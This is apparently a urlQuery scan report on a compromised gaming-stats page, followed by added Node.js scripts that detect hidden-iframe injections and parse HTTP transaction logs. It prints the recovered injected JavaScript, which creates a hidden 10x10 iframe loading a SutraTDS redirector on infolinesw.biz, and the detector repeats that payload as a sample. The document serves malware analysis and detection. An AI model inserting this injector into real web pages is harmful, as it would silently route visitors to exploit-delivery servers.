Overview

URL: http://raidstats.liebesbude.de/08_03_06_winterchill_kill
IP: 85.14.216.82
ASN: AS13301 UNITED COLO GmbH
Location: Germany
Report completed: 2012-11-13 15:45:21 CET
urlQuery Alerts:
  Detected malicious iframe injection
  Detected SutraTDS URL pattern


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (empty)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata with Emerging Threats Pro: No alerts detected
Snort with Sourcefire VRT: No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 85.14.216.82

Date | Alerts / IDS | URL | IP
2012-11-21 16:41:23 | 2 / 0 | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-21 16:37:54 | 2 / 0 | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett | 85.14.216.82
2012-11-21 09:53:48 | 2 / 0 | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett | 85.14.216.82
2012-11-21 09:45:15 | 2 / 0 | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-18 16:53:07 | 2 / 0 | http://raidstats.liebesbude.de/08_02_20_akama_kill | 85.14.216.82
2012-11-18 00:27:56 | 2 / 0 | http://raidstats.liebesbude.de/08_02_20_akama_kill/ | 85.14.216.82

Last 6 reports on ASN: AS13301 UNITED COLO GmbH

Date | Alerts / IDS | URL | IP
2013-04-10 17:07:17 | 0 / 3 | http://funbot.funpic.org/x4x.exe | 213.202.225.32
2013-04-10 16:02:17 | 1 / 1 | http://yroctpjwm16.yr.funpic.de/samsungharddrive.html | 213.202.225.74
2013-04-10 15:56:26 | 0 / 1 | http://dernjchln22.de.funpic.de/flashingwomen.html | 213.202.225.52
2013-04-10 15:49:20 | 1 / 1 | http://mlpwvmjdc16.ml.funpic.de/laserprintersamsungtoner.html | 213.202.225.73
2013-04-10 15:48:37 | 0 / 1 | http://emmwatson.em.funpic.de/displayimage.php?album=random | 213.202.225.54
2013-04-10 15:48:15 | 0 / 1 | http://dernjchln22.de.funpic.de/co-edconfidential3free.html | 213.202.225.52

Last 6 reports on domain: raidstats.liebesbude.de

Date | Alerts / IDS | URL | IP
2012-11-21 16:41:23 | 2 / 0 | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-21 16:37:54 | 2 / 0 | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett | 85.14.216.82
2012-11-21 09:53:48 | 2 / 0 | http://raidstats.liebesbude.de/oct_07/07_10_03_komplett | 85.14.216.82
2012-11-21 09:45:15 | 2 / 0 | http://raidstats.liebesbude.de/dez_07/07_12_19_supremus_kill | 85.14.216.82
2012-11-18 16:53:07 | 2 / 0 | http://raidstats.liebesbude.de/08_02_20_akama_kill | 85.14.216.82
2012-11-18 00:27:56 | 2 / 0 | http://raidstats.liebesbude.de/08_02_20_akama_kill/ | 85.14.216.82



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 561, repeated: 1) - Alert detected on script (Severity: 2)

    // Eval'd payload recovered by urlQuery: injects a hidden 10x10 iframe that
    // loads http://infolinesw.biz/in.cgi?2, the URL matched as a SutraTDS pattern.
    if (document.getElementsByTagName('body')[0]) {
        // <body> already parsed: append the frame through the DOM
        iframer();
    } else {
        // no <body> yet (script running from <head>): fall back to document.write
        document.write("<iframe src='http://infolinesw.biz/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://infolinesw.biz/in.cgi?2');
        f.style.visibility = 'hidden';   // invisible to the user
        f.style.position = 'absolute';   // pinned to the top-left corner, out of the layout
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');   // 10x10 px
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }

Executed Writes (0)
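The eval'd script above is the whole injection: it tests whether <body> has been parsed yet and then either appends a hidden 10x10 iframe through the DOM or writes the same iframe with document.write, so the inject works whether it runs from <head> or from the end of the page. The frame's src, http://infolinesw.biz/in.cgi?2, is what urlQuery matched as a SutraTDS URL pattern (an in.cgi endpoint with a numeric query string). The Node.js script below is an added example, not part of the urlQuery report, that flags this pattern in recovered script bodies: every iframe src it finds is scored on whether it is cross-site, hidden, tiny, and/or an in.cgi?N URL. The injected sample is copied from the report; the benign sample and its /widget.html path are constructed for contrast.

```javascript
// Added example, not part of the urlQuery report: a static check for the
// hidden-iframe injection pattern in the eval'd script above. Given a script
// body and the host it was served from, it reports every iframe src it can
// find together with the reasons it looks like an injected TDS redirector.
// Node.js, no dependencies.

// Script body as recovered by urlQuery (copied from the report, reflowed).
const INJECTED = `
if (document.getElementsByTagName('body')[0]) { iframer(); } else {
  document.write("<iframe src='http://infolinesw.biz/in.cgi?2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://infolinesw.biz/in.cgi?2');
  f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0';
  f.setAttribute('width', '10'); f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}`;

// Constructed benign sample for contrast: a visible, same-origin frame.
// The /widget.html path is made up for this example.
const BENIGN = `
var f = document.createElement('iframe');
f.setAttribute('src', 'http://raidstats.liebesbude.de/widget.html');
f.setAttribute('width', '600'); f.setAttribute('height', '400');
document.body.appendChild(f);`;

// iframe src set either inline (<iframe src='...'>) or via setAttribute('src', '...')
const IFRAME_SRC_RE = /<iframe\b[^>]*\bsrc=['"]([^'"]+)['"]|\.setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]+)['"]\s*\)/gi;
// CSS hiding, in either style="..." or element.style.x = '...' form
const HIDDEN_RE = /visibility\s*[:=]\s*['"]?hidden|display\s*[:=]\s*['"]?none/i;
// width/height followed closely by a number, in attribute or setAttribute form
const SIZE_RE = /\b(?:width|height)\b[^0-9]{0,6}(\d+)/gi;
// urlQuery's "SutraTDS URL pattern": an in.cgi endpoint with a numeric query string
const SUTRA_TDS_RE = /\/in\.cgi\?\d+/i;

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

// Returns [{src, host, reasons}] for each distinct iframe src that trips at
// least two indicators. One indicator alone is noisy (analytics frames are
// often small); the inject above trips all four.
function scanScript(body, pageHost) {
  const dims = [...body.matchAll(SIZE_RE)].map(m => Number(m[1]));
  const hidden = HIDDEN_RE.test(body);
  const findings = new Map();          // keyed by src: the two code paths above collapse to one
  IFRAME_SRC_RE.lastIndex = 0;
  let m;
  while ((m = IFRAME_SRC_RE.exec(body)) !== null) {
    const src = m[1] || m[2];
    if (findings.has(src)) continue;
    const host = hostOf(src);
    const reasons = [];
    if (host && host !== pageHost.toLowerCase()) reasons.push('cross-site iframe src');
    if (hidden) reasons.push('frame hidden via CSS');
    if (dims.length && dims.every(d => d <= 10)) reasons.push('frame is at most 10x10 px');
    if (SUTRA_TDS_RE.test(src)) reasons.push('SutraTDS-style in.cgi?N URL');
    if (reasons.length >= 2) findings.set(src, { src, host, reasons });
  }
  return [...findings.values()];
}

console.log(JSON.stringify(scanScript(INJECTED, 'raidstats.liebesbude.de'), null, 2));
console.log(JSON.stringify(scanScript(BENIGN, 'raidstats.liebesbude.de'), null, 2));
```

Run with node; the injected sample yields one finding for infolinesw.biz with all four reasons, the benign sample none. The regexes are deliberately loose about quoting and whitespace because injects of this family vary the exact formatting between victims; what stays constant is the combination of an off-site src, hiding, and a tiny frame.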



HTTP Transactions (10)


Each transaction is listed as the request followed by its response.
Request:
GET /08_03_06_winterchill_kill HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Location: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Content-Length: 358
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Request:
GET /08_03_06_winterchill_kill/ HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Mon, 25 Jul 2011 08:43:22 GMT
Etag: "3fe71-69bd-cec4fe80"
Accept-Ranges: bytes
Content-Length: 27069
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Request:
GET /08_03_06_winterchill_kill/custom.css HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Response:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:12 GMT
Etag: "3fe62-0-d8344200"
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Request:
GET /08_03_06_winterchill_kill/tooltip.js HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Response:
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:19 GMT
Etag: "3fe86-40e-d89f11c0"
Accept-Ranges: bytes
Content-Length: 1038
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Request:
GET /08_03_06_winterchill_kill/recap.css HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Response:
HTTP/1.1 200 OK
Content-Type: text/css
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:17 GMT
Etag: "3fe7c-10f3-d8808d40"
Accept-Ranges: bytes
Content-Length: 4339
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Request:
GET /08_03_06_winterchill_kill/rengine.js HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Response:
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:17 GMT
Etag: "3fe7d-1150-d8808d40"
Accept-Ranges: bytes
Content-Length: 4432
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Request:
GET /08_03_06_winterchill_kill/img/Help.gif HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
Response:
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Tue, 13 Nov 2012 15:07:12 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Last-Modified: Sat, 08 Mar 2008 13:21:08 GMT
Etag: "3fe49-4af-d7f73900"
Accept-Ranges: bytes
Content-Length: 1199
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Request:
GET /favicon.ico HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 13 Nov 2012 15:07:14 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
Request:
GET /favicon.ico HTTP/1.1
Host: raidstats.liebesbude.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Response:
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 13 Nov 2012 15:07:17 GMT
Server: Apache/2.0.54 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: en
Request:
GET /in.cgi?2 HTTP/1.1
Host: infolinesw.biz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/

Response: none recorded; the report's transaction list ends with this request.
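Read end to end, the transaction list tells the story: the 301 adds the trailing slash, the 200 delivers the 27 KB page, the page's own stylesheets, scripts and image load from the same host, and the last request, to infolinesw.biz/in.cgi?2 with the compromised page as Referer, is the hidden iframe from the eval'd script firing. The report records no response for it, so the next hop of the TDS chain is not captured on this page. Note also that the two alerts on this report are urlQuery's own script heuristics; both IDS rule sets saw nothing, which is consistent with the chain being cut off before any exploit content was served. The Node.js script below is an added example, not part of the urlQuery report, that parses this request/response layout into transactions and reports redirect hops, cross-origin requests with their Referer, and requests with no recorded response. The embedded log is abbreviated from the transactions above with most headers dropped; the order and values are as on the page.

```javascript
// Added example, not part of the urlQuery report: parse the report's flattened
// request/response log into transactions and pull out what an analyst wants
// from it: redirect hops, cross-origin requests (with their Referer) and
// requests the report records no response for. Node.js, no dependencies.

const SCAN_HOST = 'raidstats.liebesbude.de';

// Abbreviated from the HTTP Transactions section of the report; most headers
// are dropped, the request/response order and values are as on the page.
const LOG = `GET /08_03_06_winterchill_kill HTTP/1.1
Host: raidstats.liebesbude.de
HTTP/1.1 301 Moved Permanently
Location: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
GET /08_03_06_winterchill_kill/ HTTP/1.1
Host: raidstats.liebesbude.de
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 27069
GET /08_03_06_winterchill_kill/tooltip.js HTTP/1.1
Host: raidstats.liebesbude.de
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
HTTP/1.1 200 OK
Content-Type: application/x-javascript
GET /favicon.ico HTTP/1.1
Host: raidstats.liebesbude.de
HTTP/1.1 404 Not Found
GET /in.cgi?2 HTTP/1.1
Host: infolinesw.biz
Referer: http://raidstats.liebesbude.de/08_03_06_winterchill_kill/
`;

const REQ_RE = /^(GET|POST|HEAD) (\S+) HTTP\/1\.[01]$/;
const RESP_RE = /^HTTP\/1\.[01] (\d{3})\b/;

// Walk the log line by line. A request line opens a new transaction, a status
// line switches to its response side, and any other "Name: value" line is a
// header of whichever side is current. Lines that fit neither are skipped.
function parseTransactions(text) {
  const txs = [];
  let cur = null;
  let side = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line) continue;
    let m;
    if ((m = REQ_RE.exec(line))) {
      cur = { method: m[1], path: m[2], status: null, req: {}, resp: {} };
      txs.push(cur);
      side = 'req';
      continue;
    }
    if (cur && (m = RESP_RE.exec(line))) {
      cur.status = Number(m[1]);
      side = 'resp';
      continue;
    }
    const i = line.indexOf(':');
    if (cur && i > 0) {
      const headers = side === 'req' ? cur.req : cur.resp;
      headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
    }
  }
  return txs;
}

function urlOf(t) {
  return `http://${t.req.host}${t.path}`;
}

// Summarise the parsed transactions relative to the host that was scanned.
function analyze(txs, scanHost) {
  const redirects = txs
    .filter(t => t.status !== null && t.status >= 300 && t.status < 400 && t.resp.location)
    .map(t => ({ from: urlOf(t), to: t.resp.location }));
  const crossOrigin = txs
    .filter(t => t.req.host && t.req.host !== scanHost)
    .map(t => ({ url: urlOf(t), referer: t.req.referer || null }));
  const unanswered = txs.filter(t => t.status === null).map(urlOf);
  const hosts = [...new Set(txs.map(t => t.req.host))];
  return { hosts, redirects, crossOrigin, unanswered };
}

console.log(JSON.stringify(analyze(parseTransactions(LOG), SCAN_HOST), null, 2));
```

The same parser takes the full transaction section of a report as input, since the extra headers are just more "Name: value" lines. The cross-origin list is the part worth pivoting on: a request to a host outside the scanned site whose Referer is the scanned page is exactly what an injected iframe or script tag produces, and a cross-origin request with no recorded response is the point where the capture stopped.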